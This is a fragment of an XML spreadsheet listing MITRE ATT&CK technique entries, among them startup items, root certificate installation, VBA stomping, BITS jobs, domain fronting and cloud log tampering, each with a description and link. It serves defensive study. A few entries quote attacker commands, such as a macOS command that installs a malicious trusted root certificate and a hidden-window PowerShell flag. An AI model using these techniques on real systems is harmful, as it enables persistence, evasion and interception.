    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
https://attack.mitre.org/techniques/T1608/003</t>
  </si>
  <si>
    <t>T1037.005</t>
  </si>
  <si>
    <t>Startup Items</t>
  </si>
  <si>
    <t>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, &lt;code&gt;/Library/StartupItems&lt;/code&gt; isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), &lt;code&gt;StartupParameters.plist&lt;/code&gt;, reside in the top-level directory. 
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.
https://attack.mitre.org/techniques/T1037/005</t>
  </si>
  <si>
    <t>T1614.001</t>
  </si>
  <si>
    <t>System Language Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)
There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) 
For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language&lt;/code&gt; or parsing the outputs of Windows API functions &lt;code&gt;GetUserDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetSystemDefaultUILanguage&lt;/code&gt;, &lt;code&gt;GetKeyboardLayoutList&lt;/code&gt; and &lt;code&gt;GetUserDefaultLangID&lt;/code&gt;.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelgänging May 2018)
On a macOS or Linux system, adversaries may query &lt;code&gt;locale&lt;/code&gt; to retrieve the value of the &lt;code&gt;$LANG&lt;/code&gt; environment variable.
https://attack.mitre.org/techniques/T1614/001</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.
[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) 
By the end of 2017, a threat group used &lt;code&gt;Invoke-PSImage&lt;/code&gt; to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)
https://attack.mitre.org/techniques/T1027/003</t>
  </si>
  <si>
    <t>T1584.002</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019)  Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
https://attack.mitre.org/techniques/T1584/002</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Protocol or Service Impersonation</t>
  </si>
  <si>
    <t>Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.  
Adversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. 
Adversaries may also leverage legitimate protocols to impersonate expected web traffic or trusted services. For example, adversaries may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted data to disguise C2 communications or mimic legitimate services such as Gmail, Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation: Malleable-C2-U42)
https://attack.mitre.org/techniques/T1001/003</t>
  </si>
  <si>
    <t>T1012</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
https://attack.mitre.org/techniques/T1012</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
https://attack.mitre.org/techniques/T1030</t>
  </si>
  <si>
    <t>T1550.004</t>
  </si>
  <si>
    <t>Web Session Cookie</t>
  </si>
  <si>
    <t>Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.
There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)
https://attack.mitre.org/techniques/T1550/004</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
https://attack.mitre.org/techniques/T1078/002</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
https://attack.mitre.org/techniques/T1218/009</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Install Root Certificate</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.(Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.(Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) capability for intercepting information transmitted over secure TLS/SSL communications.(Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence.(Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain.(Citation: objective-see ay mami 2018)
https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>T1037.003</t>
  </si>
  <si>
    <t>Network Logon Script</t>
  </si>
  <si>
    <t>Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  
Adversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/003</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)
For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1499</t>
  </si>
  <si>
    <t>T1027.004</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as ilasm.exe(Citation: ATTACK IQ), csc.exe, or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)
Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)
https://attack.mitre.org/techniques/T1027/004</t>
  </si>
  <si>
    <t>T1614</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as &lt;code&gt;GetLocaleInfoW&lt;/code&gt; can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
https://attack.mitre.org/techniques/T1614</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)
https://attack.mitre.org/techniques/T1564/007</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>BITS Jobs</t>
  </si>
  <si>
    <t>Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)
Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)
BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
https://attack.mitre.org/techniques/T1197</t>
  </si>
  <si>
    <t>T1127.001</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t>Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)
Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)
https://attack.mitre.org/techniques/T1127/001</t>
  </si>
  <si>
    <t>T1656</t>
  </si>
  <si>
    <t>Impersonation</t>
  </si>
  <si>
    <t>Adversaries may impersonate a trusted person or organization in order to persuade and trick a target into performing some action on their behalf. For example, adversaries may communicate with victims (via [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while impersonating a known sender such as an executive, colleague, or third-party vendor. Established trust can then be leveraged to accomplish an adversary’s ultimate goals, possibly against multiple victims. 
In many cases of business email compromise or email fraud campaigns, adversaries use impersonation to defraud victims -- deceiving them into sending money or divulging information that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).
Adversaries will often also use social engineering techniques such as manipulative and persuasive language in email subject lines and body text such as `payment`, `request`, or `urgent` to push the victim to act quickly before malicious activity is detected. These campaigns are often specifically targeted against people who, due to job roles and/or accesses, can carry out the adversary’s goal.   
Impersonation is typically preceded by reconnaissance techniques such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589) and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591) as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001)) to substantiate their false identity.(Citation: CrowdStrike-BEC)
There is the potential for multiple victims in campaigns involving impersonation. For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) targeting one organization which can then be used to support impersonation against other entities.(Citation: VEC)
https://attack.mitre.org/techniques/T1656</t>
  </si>
  <si>
    <t>T1578.005</t>
  </si>
  <si>
    <t>Modify Cloud Compute Configurations</t>
  </si>
  <si>
    <t>Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535).
https://attack.mitre.org/techniques/T1578/005</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).
For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.
https://attack.mitre.org/techniques/T1090/004</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
The ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.
An adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.
The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
https://attack.mitre.org/techniques/T1557/002</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Disable or Modify Cloud Logs</t>
  </si>
  <si>
    <t>An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>T1518.001</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), &lt;code&gt;reg query&lt;/code&gt; with [Reg](https://attack.mitre.org/software/S0075), &lt;code&gt;dir&lt;/code&gt; with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
Adversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents  may collect  metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.
https://attack.mitre.org/techniques/T1518/001</t>
  </si>
  <si>
    <t>T1564.003</t>
  </si>
  <si>
    <t>Hidden Window</t>
  </si>
  <si>
    <t>Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. 
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be &lt;code&gt;apple.awt.UIElement&lt;/code&gt;, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is &lt;code&gt;powershell.exe -WindowStyle Hidden&lt;/code&gt;.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding &lt;code&gt;explorer.exe&lt;/code&gt; process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack)  All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.
https://attack.mitre.org/techniques/T1564/003</t>
  </si>
  <si>
    <t>T1127.002</t>
  </si>
  <si>
    <t>ClickOnce</t>
  </si>
  <si>
    <t>Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
